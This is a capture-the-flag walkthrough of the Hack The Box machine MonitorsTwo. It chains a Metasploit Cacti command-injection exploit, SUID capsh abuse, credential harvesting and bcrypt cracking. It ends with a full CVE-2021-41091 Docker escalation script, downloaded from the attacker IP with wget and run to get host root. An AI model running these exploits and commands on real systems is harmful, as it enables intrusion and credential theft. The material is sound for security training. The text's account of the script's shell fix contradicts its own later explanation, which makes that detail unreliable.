Connect to the HTB VPN and start the target machine
Target IP: 10.10.11.211
Attacker IP (assigned by the VPN): 10.10.16.7
Information gathering
Scan all TCP ports (1-65535) on the target with rustscan
rustscan -a 10.10.11.211 -r 1-65535
Run nmap service detection and default scripts against the open ports
nmap -p 22,80 -sCV 10.10.11.211
Exploitation
Open port 80 of the target in a browser
The comment at the bottom of the login page identifies the web application as Cacti 1.2.22
Search searchsploit for known exploits for that version
searchsploit Cacti 1.2.22
Start Metasploit to exploit it
msfconsole
Search for a module matching this application
search Cacti 1.2.22
Select the module
use exploit/linux/http/cacti_unauthenticated_cmd_injection
Options to set: PAYLOAD, LHOST, LPORT, RHOSTS, RPORT
Run exploit (or run) to get a shell
Privilege escalation
Upgrade to a proper TTY
script -c /bin/bash -q /dev/null
List everything in the root directory. The presence of .dockerenv means we are inside a Docker container (the hostname 50bca5e748b0 in the prompt is a container ID, another sign):
ls -a /
www-data@50bca5e748b0:/var/tmp$ ls -a /
. bin entrypoint.sh lib mnt root srv usr
.. boot etc lib64 opt run sys var
.dockerenv dev home media proc sbin tmp
Upload linpeas.sh into the container via Meterpreter (with a relative name it lands in the session's current directory, /var/tmp here)
upload linpeas.sh
meterpreter > upload linpeas.sh
[*] Uploading : /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
[*] Uploaded -1.00 B of 805.42 KiB (0.0%): /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
[*] Completed : /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
Make linpeas.sh executable (chmod +x is all that is needed; 777 is what was run here)
chmod 777 linpeas.sh
meterpreter > shell
Process 12228 created.
Channel 215 created.
script -c /bin/bash -q /dev/null
www-data@50bca5e748b0:/var/tmp$ ls
linpeas.sh
www-data@50bca5e748b0:/var/tmp$ ls -l linpeas.sh
-rw-r--r-- 1 www-data www-data 824745 Nov 19 13:21 linpeas.sh
www-data@50bca5e748b0:/var/tmp$ chmod 777 linpeas.sh
Run the script
./linpeas.sh
The SUID section of its output lists /sbin/capsh
Look the binary up on GTFOBins
Try to escalate to root inside the container directly: capsh is SUID root, so it can set uid and gid to 0 before exec'ing a shell
/sbin/capsh --gid=0 --uid=0 --
www-data@50bca5e748b0:/var/tmp$ /sbin/capsh --gid=0 --uid=0 --
root@50bca5e748b0:/var/tmp# whoami
root
Lateral movement
Search the container for configuration-related files
find / -name '*conf*' -type f 2>/dev/null | tee res.txt
Grep each of those files for the string password (-H prints the file name next to each hit)
xargs -I {} grep -iH "password" {} < res.txt
The hits include the string cactiuser; find out which file it comes from
xargs -I {} sh -c 'grep -m1 "cactiuser" "{}" && echo "Found in {}"' < res.txt
root@50bca5e748b0:/var/tmp# xargs -I {} sh -c 'grep -m1 "cactiuser" "{}" && echo "Found in {}"' < res.txt
#$rdatabase_username = 'cactiuser';
Found in /var/www/html/include/config.php
View /var/www/html/include/config.php
cat /var/www/html/include/config.php
It contains the credentials of the database root account that Cacti uses
Username: root
Password: root
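The hunt above (find config-like files, grep the list for password, then work out which file a string came from) folded into one function, as an added example that is not part of the original writeup. It assumes GNU find and grep, prints file:line for every hit so the source file is known at once, and goes a little beyond what was searched above by also matching .env/.ini files and the keywords secret and api key.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup: the find + grep hunt as one
# function that prints file:line:match for credential-looking assignments.

hunt_creds() {
    # $1: directory to search (default /). Output: one "file:line:text" per hit.
    local root="${1:-/}"
    # '*conf*' catches config.php, *.conf, settings.conf; .env and .ini are
    # common credential carriers the name pattern would otherwise miss.
    # The regex wants the keyword followed (after optional text) by = or :,
    # so a mere mention of "password" in documentation is not reported.
    find "$root" -type f \( -name '*conf*' -o -name '*.env' -o -name '*.ini' \) \
        -exec grep -HinE '(passw(or)?d|secret|api[_-]?key)[^=:]*[=:]' {} + 2>/dev/null
}

# Usage on the target (from the container, as in the writeup):
#   hunt_creds / | tee creds.txt
```

Commented-out lines such as the #$rdatabase_... entries in Cacti's config.php are reported too, which is wanted: stale credentials in comments are exactly what the original grep surfaced.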
Connect to the database with those credentials (the hostname db resolves from inside the container)
mysql -h db -u 'root' -p'root' 'cacti'
List the tables
SHOW TABLES;
MySQL [cacti]> SHOW TABLES;
+-------------------------------------+
| Tables_in_cacti |
+-------------------------------------+
<...SNIP...>
| snmpagent_cache_notifications |
| snmpagent_cache_textual_conventions |
| snmpagent_managers |
| snmpagent_managers_notifications |
| snmpagent_mibs |
| snmpagent_notifications_log |
| user_auth |
| user_auth_cache |
| user_auth_group |
| user_auth_group_members |
| user_auth_group_perms |
| user_auth_group_realm |
| user_auth_perms |
<...SNIP...>
+-------------------------------------+
111 rows in set (0.001 sec)
The user_auth table stands out (it holds Cacti's own login accounts); dump it
SELECT * FROM user_auth;
Username: marcus
Password hash: $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
Write the hash to a file
echo '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C' > hash
Crack it with john (the $2y$ prefix marks a bcrypt hash, which john detects on its own)
john hash --wordlist=../dictionary/rockyou.txt
Username: marcus
密码:funkymonkey
Log in to the target over SSH with those credentials
ssh marcus@10.10.11.211
Locate and read the user flag
marcus@monitorstwo:~$ find / -name 'user.txt' 2>/dev/null
/home/marcus/user.txt
marcus@monitorstwo:~$ cat /home/marcus/user.txt
3cdce88c7f2a5678a8eb5bfe4f9dbb5f
USER_FLAG:3cdce88c7f2a5678a8eb5bfe4f9dbb5f
Privilege escalation
In /var/mail there is a mail file for marcus. Its content, summarized as a table:

| CVE | Affected | Cause | Possible impact | Remediation |
|---|---|---|---|---|
| CVE-2021-33033 | Linux kernel before 5.11.14 | Use-after-free caused by mishandled CIPSO and CALIPSO reference counting for DOI definitions | Attacker can write an arbitrary value | Update the kernel to 5.11.14 or later |
| CVE-2020-25706 | Cacti 1.2.13 | Error messages not properly escaped in the xml_path field during template import preview (XSS) | Malicious code injected into the page; possible theft of sensitive data or session hijacking | Upgrade to Cacti 1.2.14 or later |
| CVE-2021-41091 | Moby (the open-source project Docker is built on) | Data directory with insufficiently restricted permissions lets unprivileged users traverse its contents and execute programs in it | Privilege escalation on the host | Update Moby (Docker Engine) to 20.10.9, then stop and restart running containers |
- We already have a foothold on the box, and CVE-2020-25706 is a web-application (XSS) vulnerability, so it is of no use here
- Next, check the kernel version
uname -a
marcus@monitorstwo:/var/tmp$ uname -a
Linux monitorstwo 5.4.0-147-generic #164-Ubuntu SMP Tue Mar 21 14:23:17 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
- CVE-2021-33033 is described as affecting kernels before 5.11.14, and 5.4.0 nominally falls in that range, but an upstream version range says little about a distribution kernel: Ubuntu backports security fixes into its 5.4 series, and this build dates from March 2023, long after the 2021 fix, so it is not a promising path
Check the Docker version on the target
docker -v
marcus@monitorstwo:/var/tmp$ docker -v
Docker version 20.10.5+dfsg1, build 55c4c88
Docker 20.10.5 is below the fixed release 20.10.9, so this Docker Engine is affected by the CVE-2021-41091 permission issue
Look for a PoC on GitHub. The script used is reproduced below, reformatted and with three small fixes marked in comments (the version check no longer reports 20.10.9 itself as vulnerable, the mount list is read with findmnt options instead of trimming tree characters, and the root test no longer swallows the loop's stdin)
#!/bin/bash
# CVE-2021-41091 PoC: an unprivileged host user runs a setuid bash that was
# planted as root inside a container, through the container's overlay2 merged dir.

# "Docker version 20.10.5+dfsg1, build 55c4c88" -> "20.10.5"
# (fix: also strip the distro suffix so the numeric comparison below is clean)
docker_version=$(docker --version 2>/dev/null | awk '{print $3}' | sed 's/,//; s/[^0-9.].*$//')

if [ -z "$docker_version" ]; then
    echo "[x] Docker not found or an error occurred while checking the version."
    exit 1
fi

IFS='.' read -ra ver_parts <<< "$docker_version"
IFS='.' read -ra min_parts <<< "20.10.9"

# fix: start from "not vulnerable" and only flip on a strictly lower component,
# so that exactly 20.10.9 (the fixed release) is not reported as vulnerable
is_vulnerable=false
for i in "${!ver_parts[@]}"; do
    if [[ "${ver_parts[i]}" -gt "${min_parts[i]}" ]]; then
        break
    elif [[ "${ver_parts[i]}" -lt "${min_parts[i]}" ]]; then
        is_vulnerable=true
        break
    fi
done

if $is_vulnerable; then
    # host-side mount points of the container root filesystems
    # (fix: -l list output, -n no header, -o TARGET only, instead of cutting
    # two characters off findmnt's tree drawing)
    result=$(findmnt -ln -o TARGET 2>/dev/null | grep "/var/lib/docker/overlay2")

    if [[ "$result" =~ "/var/lib/docker/overlay2" ]]; then
        echo "[!] Vulnerable to CVE-2021-41091"
        echo "[!] Now connect to your Docker container that is accessible and obtain root access !"
        echo "[>] After gaining root access execute this command (chmod u+s /bin/bash)"
        echo ""
        read -p "Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): " response

        if [[ "$response" != "yes" ]]; then
            echo "[x] Please set the setuid bit on /bin/bash in the Docker container and try again."
            exit 2
        fi

        echo "[!] Available Overlay2 Filesystems:"
        echo -e "$result\n"

        echo "[!] Iterating over the available Overlay2 filesystems !"
        while read -r path; do
            echo "[?] Checking path: $path"
            if cd "$path" 2>/dev/null; then
                # fix: run a one-liner instead of a bare ./bin/bash -p, which would
                # read the rest of the here-string as its script, and confirm that
                # -p really yields euid 0 rather than just any shell
                if ./bin/bash -p -c '[ "$(id -u)" -eq 0 ]' 2>/dev/null; then
                    echo "[!] Rooted !"
                    echo "[>] Current Vulnerable Path: $(pwd)"
                    echo "[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'"
                    echo ""
                    echo "[!] Spawning Shell"
                    # fix: reattach stdin to the terminal; inside the loop stdin is the
                    # exhausted here-string, so the interactive shell would exit at once
                    exec ./bin/bash -p -i < /dev/tty
                else
                    echo -e "[x] Could not get root access in '$path'\n"
                fi
            else
                echo -e "[x] Could not access or change directory to '$path'\n"
            fi
        done <<< "$result"
    else
        echo "[x] There's no /var/lib/docker/overlay2 files ! Not vulnerable to CVE-2021-41091"
    fi
else
    echo "[x] Docker version is greater or equal to 20.10.9, not vulnerable to CVE-2021-41091"
fi
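Before running a PoC, the condition it relies on can be verified directly. The two functions below are an added example, not part of the writeup or of the PoC: one checks whether the Docker data root is traversable by other users (the permission problem fixed in 20.10.9, which made the directory 0710), the other lists the setuid files reachable through the overlay2 merged directories, which is what a planted setuid /bin/bash shows up as on the host. Default paths are the standard Docker locations; the stat -c form is GNU coreutils.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup or of the PoC.
# CVE-2021-41091 comes down to two facts: the Docker data root lets other users
# traverse it, and container root filesystems are mounted under
# /var/lib/docker/overlay2/<id>/merged, so a setuid binary created as root inside
# a container is a setuid-root file on the host. Paths are parameters so the
# functions can be run against any directory tree.

# Succeed (exit 0) if "others" have the search/execute bit on the data root,
# i.e. an unprivileged host user can reach the overlay2 directories at all.
docker_root_traversable() {
    local root="${1:-/var/lib/docker}" mode
    mode=$(stat -c '%a' "$root") || return 2   # GNU stat: octal mode, e.g. 755
    # the last octal digit is the "others" triplet; its lowest bit is execute/search
    [ $(( 8#$mode & 1 )) -eq 1 ]
}

# Print every setuid file reachable through <overlay2>/*/merged, one per line.
# On a patched Engine the data root is 0710, so a non-root caller cannot stat
# the merged directories and this prints nothing even if such files exist.
overlay2_setuid_files() {
    local overlay="${1:-/var/lib/docker/overlay2}" d
    for d in "$overlay"/*/merged; do
        [ -d "$d" ] || continue
        # -xdev: stay on this mount (do not descend into a container's /proc etc.)
        # -perm -4000: setuid bit set, whatever the other mode bits are
        find "$d" -xdev -type f -perm -4000 2>/dev/null
    done
    return 0
}

# Usage on the target as marcus (before and after planting the setuid bash):
#   docker_root_traversable && overlay2_setuid_files
```

Run before the chmod u+s step, the second function shows only the images' own setuid binaries; run after it, the planted /bin/bash appears under exactly one merged directory, which is the path the PoC's loop ends up in.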
Serve the script from the attacker machine with Python's built-in HTTP server
python -m http.server 6666
Download it on the target with wget
wget http://10.10.16.7:6666/exp.sh -O exp.sh
Make it executable
chmod +x exp.sh
Run the script
./exp.sh
marcus@monitorstwo:/var/tmp$ ./exp.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)
At this point the script asks us to set the SUID bit on /bin/bash as root inside the container
chmod u+s /bin/bash
root@50bca5e748b0:/# chmod u+s /bin/bash
Back in the SSH session as marcus, answer the script's prompt
Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell
bash-5.1# exit
The shell the script spawns exits immediately (the bash -i it exec's inherits the loop's exhausted here-string as stdin, hence the bare "exit" above), so follow the hint in its output: change into the reported merged directory
cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
and start bash again with -p, which keeps the setuid effective uid instead of dropping it
./bin/bash -p
This gives a root shell on the host
marcus@monitorstwo:/var/tmp$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ./bin/bash -p
bash-5.1# whoami
root
Locate and read the root flag
bash-5.1# find / -name 'root.txt'
find: ‘/proc/4515/task/4515/net’: Invalid argument
find: ‘/proc/4515/net’: Invalid argument
/root/root.txt
bash-5.1# cat /root/root.txt
3a46a93a5f2c49137b7972724fd00c05